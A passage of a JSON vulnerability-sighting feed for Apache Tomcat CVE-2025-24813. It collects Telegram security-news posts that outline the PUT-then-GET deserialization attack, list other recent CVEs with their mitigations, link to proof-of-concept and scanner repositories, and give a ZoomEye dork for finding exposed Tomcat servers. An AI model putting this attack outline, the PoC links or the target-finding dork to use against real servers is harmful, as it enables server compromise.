\u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0434\u0432\u0443\u0445\u044d\u0442\u0430\u043f\u043d\u044b\u0439 \u043c\u0435\u0442\u043e\u0434 \u0430\u0442\u0430\u043a\u0438: \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442\u0441\u044f \u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0444\u0430\u0439\u043b Java-\u0441\u0435\u0441\u0441\u0438\u0438 \u0447\u0435\u0440\u0435\u0437 PUT-\u0437\u0430\u043f\u0440\u043e\u0441, \u0437\u0430\u0442\u0435\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f GET-\u0437\u0430\u043f\u0440\u043e\u0441 \u0441 \u0443\u043a\u0430\u0437\u0430\u043d\u0438\u0435\u043c \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u0430 \u0441\u0435\u0441\u0441\u0438\u0438 (JSESSIONID), \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u043f\u0440\u0438 \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438.\n\n\u041e\u0442\u043c\u0435\u0447\u0430\u0435\u0442\u0441\u044f, \u0447\u0442\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0434\u0430\u043d\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0438 \u043d\u043e\u0441\u0438\u0442 \u043a\u0440\u0430\u0439\u043d\u0435 \u043d\u0438\u0437\u043a\u0438\u0439 \u043f\u043e\u0440\u043e\u0433 \u0432\u0445\u043e\u0434\u0430. \u0415\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0435 \u0442\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u0435 \u2014 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 Tomcat \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0433\u043e \u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0449\u0430 \u0441\u0435\u0441\u0441\u0438\u0439.\n\n\u0411\u043e\u043b\u0435\u0435 \u0442\u043e\u0433\u043e, \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043f\u0440\u043e\u0433\u043d\u043e\u0437\u0438\u0440\u0443\u044e\u0442, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0432\u0441\u043a\u043e\u0440\u0435 \u043d\u0430\u0447\u043d\u0443\u0442 \u0430\u0434\u0430\u043f\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0442\u0430\u043a\u0442\u0438\u043a\u0443, \u043d\u0435 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0432\u0430\u044f\u0441\u044c \u043c\u0430\u043d\u0438\u043f\u0443\u043b\u044f\u0446\u0438\u0435\u0439 \u0441 \u0441\u0435\u0441\u0441\u0438\u044f\u043c\u0438. \u0412\u043e\u0437\u043c\u043e\u0436\u043d\u044b \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 JSP-\u0444\u0430\u0439\u043b\u043e\u0432, \u043c\u043e\u0434\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044f \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0439 \u0438 \u0440\u0430\u0437\u043c\u0435\u0449\u0435\u043d\u0438\u0435 \u0431\u044d\u043a\u0434\u043e\u0440\u043e\u0432 \u0432\u043d\u0435 \u043e\u0431\u043b\u0430\u0441\u0442\u0438 \u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0441\u0435\u0441\u0441\u0438\u0439.\n\n\u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 Apache Tomcat \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u043e\u0440\u0435\u0435 \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u0434\u043b\u044f \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044f \u0430\u0442\u0430\u043a.\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2025-03-18T07:57:43.000000Z"}, {"uuid": "ff4e5bae-8deb-403d-98ac-6594ac65f679", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://t.me/itsec_news/5777", "content": "\u200b\u26a1\ufe0f11 \u0446\u0438\u0444\u0440\u043e\u0432\u044b\u0445 \u0434\u044b\u0440, \u0447\u0435\u0440\u0435\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0436\u043d\u043e \u0443\u043d\u0435\u0441\u0442\u0438 \u0432\u0441\u0451: \u043e\u0442 \u0434\u0430\u043d\u043d\u044b\u0445 \u0434\u043e \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043d\u0438\u044f\n\n\ud83d\udcac \u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b Positive Technologies \u043e\u0442\u043d\u0435\u0441\u043b\u0438 \u043a \u0447\u0438\u0441\u043b\u0443 \u0442\u0440\u0435\u043d\u0434\u043e\u0432\u044b\u0445 \u0435\u0449\u0451 \u043e\u0434\u0438\u043d\u043d\u0430\u0434\u0446\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044e\u0449\u0438\u0445 \u043a\u043b\u044e\u0447\u0435\u0432\u044b\u0435 \u044d\u043b\u0435\u043c\u0435\u043d\u0442\u044b \u0446\u0438\u0444\u0440\u043e\u0432\u043e\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b. \u0412 \u0441\u043f\u0438\u0441\u043e\u043a \u0432\u043e\u0448\u043b\u0438 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b Microsoft, \u0433\u0438\u043f\u0435\u0440\u0432\u0438\u0437\u043e\u0440\u044b VMware, \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440 Kubernetes \u0438 \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440 Apache Tomcat.\n\nMicrosoft\n\nCVE-2024-30085 \u2014 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0435 Windows Cloud Files Mini Filter (CVSS 7.8) \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c SYSTEM-\u0434\u043e\u0441\u0442\u0443\u043f. \u041e\u0448\u0438\u0431\u043a\u0430 \u0432\u044b\u0437\u0432\u0430\u043d\u0430 \u043f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435\u043c \u0431\u0443\u0444\u0435\u0440\u0430 \u043a\u0443\u0447\u0438 \u043f\u0440\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 \u0431\u0438\u0442\u043e\u0432\u044b\u0445 \u043a\u0430\u0440\u0442. \u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 : \u0441\u0435\u0433\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044f \u0441\u0435\u0442\u0438, PoLP, \u0443\u0441\u0438\u043b\u0435\u043d\u043d\u044b\u0439 \u043c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u043d\u0433.\n\nCVE-2025-24983 \u2014 \u043e\u0448\u0438\u0431\u043a\u0430 \u0432 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u044f\u0434\u0440\u0430 Win32 (CVSS 7.0) \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0447\u0435\u0440\u0435\u0437 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u0443\u044e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0443, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u0433\u043e\u043d\u043a\u0443. \u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 : \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0445 \u043f\u0440\u0430\u0432, \u043c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u043d\u0433 \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u044d\u0441\u043a\u0430\u043b\u0430\u0446\u0438\u0438.\n\nCVE-2025-26633 \u2014 \u043e\u0431\u0445\u043e\u0434 \u0437\u0430\u0449\u0438\u0442\u044b \u0432 Microsoft Management Console (CVSS 7.0). \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0432\u043d\u0435\u0434\u0440\u0438\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 MSC-\u0444\u0430\u0439\u043b \u0447\u0435\u0440\u0435\u0437 \u0444\u0438\u0448\u0438\u043d\u0433. \u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 : \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0430 MSC \u0438 VHD-\u0444\u0430\u0439\u043b\u043e\u0432 \u043d\u0430 \u043f\u0440\u043e\u043a\u0441\u0438 \u0438 \u043c\u0435\u0436\u0441\u0435\u0442\u0435\u0432\u044b\u0445 \u044d\u043a\u0440\u0430\u043d\u0430\u0445.\n\nCVE-2025-24071 \u2014 \u0441\u043f\u0443\u0444\u0438\u043d\u0433 \u0432 Windows File Explorer (CVSS 7.5). \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c NTLM-\u0445\u0435\u0448\u0438, \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044f LIBRARY-MS-\u0444\u0430\u0439\u043b\u044b. \u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 : \u043f\u043e\u0434\u043f\u0438\u0441\u044b\u0432\u0430\u043d\u0438\u0435 SMB, \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 NTLM.\n\nCVE-2025-24993 \u2014 RCE \u0432 \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 NTFS (CVSS 7.8). \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0447\u0435\u0440\u0435\u0437 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 VHD-\u0434\u0438\u0441\u043a.\n\nCVE-2025-24985 \u2014 \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u0430\u044f RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Fast FAT (CVSS 7.8), \u0442\u0430\u043a\u0436\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 VHD \u0434\u043b\u044f \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e.\n\nVMware\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Shadowserver, \u0431\u043e\u043b\u0435\u0435 40 \u0442\u044b\u0441. \u0443\u0437\u043b\u043e\u0432 ESXi \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u0438\u0437\u0432\u043d\u0435 \u0438 \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u0440\u0438\u0441\u043a\u0443:\n\nCVE-2025-22224 (CVSS 9.3) \u2014 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044c \u0447\u0435\u0440\u0435\u0437 TOCTOU \u0432 \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0435 ESXi \u0438 Workstation.\n\nCVE-2025-22225 (CVSS 8.2) \u2014 \u0437\u0430\u043f\u0438\u0441\u044c \u043a\u043e\u0434\u0430 \u0432 \u043e\u0431\u043b\u0430\u0441\u0442\u044c \u044f\u0434\u0440\u0430 VMX-\u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430.\n\nCVE-2025-22226 (CVSS 7.1) \u2014 \u0443\u0442\u0435\u0447\u043a\u0430 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0447\u0435\u0440\u0435\u0437 \u0447\u0442\u0435\u043d\u0438\u0435 \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u0430\u043c\u0438 \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c\u043e\u0433\u043e \u0434\u0438\u0430\u043f\u0430\u0437\u043e\u043d\u0430 \u0432 HGFS.\n\n\u0420\u0435\u0448\u0435\u043d\u0438\u044f : \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 VMware Workstation 17.6.3, Fusion 13.6.3 \u0438 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u043f\u0430\u0442\u0447\u0435\u0439.\n\nKubernetes\n\nCVE-2025-1974 (CVSS 9.8) \u2014 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 ingress-nginx \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043a\u043e\u0434 \u043d\u0430 \u0443\u0440\u043e\u0432\u043d\u0435 \u043a\u043b\u0430\u0441\u0442\u0435\u0440\u0430. \u041f\u043e\u0434 \u0443\u0434\u0430\u0440\u043e\u043c \u0431\u043e\u043b\u0435\u0435 6500 \u0438\u043d\u0441\u0442\u0430\u043d\u0441\u043e\u0432, \u043f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Wiz .\n\n\u041c\u0435\u0440\u044b \u0437\u0430\u0449\u0438\u0442\u044b : \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 ingress-nginx, \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 Validating Admission Controller \u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u043e\u0432.\n\nApache\n\nCVE-2025-24813 (CVSS 9.8) \u2014 RCE \u0432 Tomcat \u0447\u0435\u0440\u0435\u0437 \u0447\u0430\u0441\u0442\u0438\u0447\u043d\u044b\u0435 PUT-\u0437\u0430\u043f\u0440\u043e\u0441\u044b \u0438 \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044e. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 Rapid7 \u0432\u044b\u044f\u0432\u0438\u043b\u043e ~200 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432.\n\n\u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 : \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043e Tomcat 9.0.99, 10.1.35, 11.0.3 \u0438 \u0432\u044b\u0448\u0435.\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2025-04-11T17:25:57.000000Z"}, {"uuid": "76a68388-121a-4647-ba57-6481e409963e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/31391", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-24813-Scanner\nURL\uff1ahttps://github.com/Mattb709/CVE-2025-24813-Scanner\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-04-12T19:15:05.000000Z"}, {"uuid": "d403bdcb-35b8-4cae-b60b-30ba2757df54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/TopCyberTechNews/432", "content": "Top Security News for Today\n\nImpossible XXE in PHP  \nhttps://www.reddit.com/r/netsec/comments/1j9f0i7/impossible_xxe_in_php/\n\nAnalysis of CVE-2025-24813 Apache Tomcat Path Equivalence RCE  \nhttps://www.reddit.com/r/netsec/comments/1j9f0ur/analysis_of_cve202524813_apache_tomcat_path/\n\nCybersecurity Can\u2019t Wait: Modern Enterprises Must Adapt  \nhttps://www.tripwire.com/state-of-security/cybersecurity-cant-wait-modern-enterprises-must-adapt\n\nPre-authentication SQL injection to RCE in GLPI (CVE-2025-24799/CVE-2025-24801)  \nhttps://www.reddit.com/r/netsec/comments/1j9hcdw/preauthentication_sql_injection_to_rce_in_glpi/\n\nChina, Russia, Iran, and North Korea Intelligence Sharing  \nhttps://www.schneier.com/blog/archives/2025/03/china-russia-iran-and-north-korea-intelligence-sharing.html\n\nBehind the Scenes of Burp AI: How we built it, and what's next  \nhttps://portswigger.net/blog/behind-the-scenes-of-burp-ai-how-we-built-it-and-whats-next\n\nNew Lumma Stealer campaign abuses Reddit threads to drop malware via fake WeTransfer links  \nhttps://www.reddit.com/r/netsec/comments/1j9xq07/new_lumma_stealer_campaign_abuses_reddit_threads/\n\nRuthless Mantis - Modus Operandi  \nhttps://www.reddit.com/r/netsec/comments/1j9v0dh/ruthless_mantis_modus_operandi/\n\nFollow Top Cyber News at https://t.me/TopCyberTechNews Feel free to DM me at https://twitter.com/ShayaFeedman", "creation_timestamp": "2025-03-13T09:30:43.000000Z"}, {"uuid": "c9e7767d-cdb0-4013-86d1-6ccd42137fcd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/cyber_hsecurity/4445", "content": "This exploit targets Apache Tomcat &lt; 11.0.3, 10.1.35, and 9.0.98 via CVE-2025-24813, allowing RCE. Risks: complete server compromise. Affects millions globally.\n\nJoin: https://t.me/+qeejqIiGum9jOTI9\nContact: @a1887bot", "creation_timestamp": "2025-05-04T07:31:23.000000Z"}, {"uuid": "7ca9c943-3472-4ff2-aee6-ef8572488ffe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/18294", "content": "\ud83d\udea8CVE-2025-24813: Apache Tomcat potential RCE and/or information disclosure and/or information corruption with partial PUT\n\nZoomEye Link: https://www.zoomeye.ai/searchResult?q=YXBwPSJBcGFjaGUgVG9tY2F0Ig%3D%3D\n\nZoomEye Dork: app=\"Apache Tomcat\"\n\nResults: 815,431 \n\nAdvisory: https://github.com/advisories/GHSA-83qj-6fr2-vhqg\n\nPoC: https://github.com/absholi7ly/POC-CVE-2025-24813\n\nCVSS: 9.2\n\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\n\nFollow @zoomeye_team's official Twitter/X account and send the message \u201cDark Web Informer\u201d via DM to receive an extra 15-day membership.\n\nI am trying to do more for this community, so this is just the start! \ud83d\udc99", "creation_timestamp": "2025-06-18T16:12:19.000000Z"}, {"uuid": "d0ded87f-61ee-43fe-bc34-f699c723985a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://t.me/kasperskyb2b/1691", "content": "\u2b50\ufe0f \u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f APT \u0438 \u043d\u043e\u0432\u043e\u0441\u0442\u0438 \u0418\u0411 \u0437\u0430 \u043d\u0435\u0434\u0435\u043b\u044e\n\n\u25b6\ufe0f\u041d\u043e\u0432\u044b\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u0441 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u0435\u043c \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a\u0430 TookPS. \u0420\u0430\u043d\u0435\u0435 \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u0435 \u0441\u0430\u0439\u0442\u044b DeepSeek, \u043d\u043e \u0442\u0435\u043f\u0435\u0440\u044c \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0438\u0442\u0435\u043b\u0438 \u0442\u0430\u043a\u0436\u0435 \u043c\u0438\u043c\u0438\u043a\u0440\u0438\u0440\u0443\u044e\u0442 \u043f\u043e\u0434 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0441\u0430\u0439\u0442\u044b \u041f\u041e \u0434\u043b\u044f 3D-\u043c\u043e\u0434\u0435\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f, \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430, \u0438 \u0434\u0440.\n \n\u25b6\ufe0f\u0412\u043e\u043e\u0431\u0449\u0435 \u043d\u043e\u0432\u044b\u0445 \u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0451\u043d\u043d\u044b\u0445 \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a\u043e\u0432 \u043f\u043e\u0434\u0432\u0435\u0437\u043b\u0438 \u043c\u043d\u043e\u0433\u043e: IDATloader/HijackLoader, Emmenthal/Smokeloader, Gootloader.\n\n\u25b6\ufe0fOperation HoloQuill \u0430\u0442\u0430\u043a\u0443\u0435\u0442 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0435 \u0438 \u043f\u0440\u043e\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u044b\u0435 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 \u0446\u0435\u043b\u0435\u0432\u043e\u0433\u043e \u0444\u0438\u0448\u0438\u043d\u0433\u0430 \u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0430\u0440\u0445\u0438\u0432\u043e\u0432 \u0441 \u043c\u043d\u043e\u0433\u043e\u0441\u0442\u0443\u043f\u0435\u043d\u0447\u0430\u0442\u044b\u043c \u0412\u041f\u041e, \u0432 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u043c \u0441\u0447\u0435\u0442\u0435 \u0440\u0430\u0437\u0432\u043e\u0440\u0430\u0447\u0438\u0432\u0430\u044e\u0449\u0438\u043c \u0438\u043c\u043f\u043b\u0430\u043d\u0442 Cobalt Strike.\n\n\u25b6\ufe0f\u0414\u0435\u0442\u0430\u043b\u044c\u043d\u044b\u0439 \u0440\u0430\u0437\u0431\u043e\u0440 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u043e\u0432 \u0437\u0430\u0449\u0438\u0442\u044b MS-NRPC \u0438 \u0438\u0445 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u0435\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u0432\u044b\u0437\u044b\u0432\u0430\u0442\u044c \u043c\u043d\u043e\u0433\u0438\u0435 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, \u0434\u0430\u0436\u0435 \u0435\u0441\u043b\u0438 \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0430 RPC \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0442\u0440\u0435\u0431\u0443\u0435\u0442.\n\n\u25b6\ufe0f\u041e\u0431\u0437\u043e\u0440 APT Earth Alux \u0438 \u0435\u0451 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0433\u043e \u0412\u041f\u041e, \u0431\u044d\u043a\u0434\u043e\u0440\u0430 Vargeit. \u0410\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435, \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0438\u0437 \u0410\u0437\u0438\u0438, \u043e\u0442\u0434\u0430\u044e\u0442 \u043f\u0440\u0438\u043e\u0440\u0438\u0442\u0435\u0442 \u0434\u043b\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c \u0438 \u0441\u043a\u0440\u044b\u0442\u043d\u044b\u043c \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u044f\u043c, \u043c\u0438\u0448\u0435\u043d\u0438 \u043f\u0440\u0435\u0438\u043c\u0443\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u044b \u0432 \u0410\u0437\u0438\u0438 \u0438 \u041b\u0430\u0442\u0438\u043d\u0441\u043a\u043e\u0439 \u0410\u043c\u0435\u0440\u0438\u043a\u0435.\n \n\u25b6\ufe0f\u0422\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u044f \u043c\u0430\u0441\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u04212 \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c Fast flux \u043d\u0435\u043e\u0436\u0438\u0434\u0430\u043d\u043d\u043e \u0443\u0434\u043e\u0441\u0442\u043e\u0438\u043b\u0430\u0441\u044c \u0431\u044e\u043b\u043b\u0435\u0442\u0435\u043d\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043e\u0442 CISA, \u0410\u041d\u0411, \u0424\u0411\u0420 \u0438 \u043f\u0440\u043e\u0447\u0438\u0445 \u0430\u043d\u0433\u043b\u043e\u044f\u0437\u044b\u0447\u043d\u044b\u0445 \u0430\u0433\u0435\u043d\u0442\u0441\u0442\u0432.  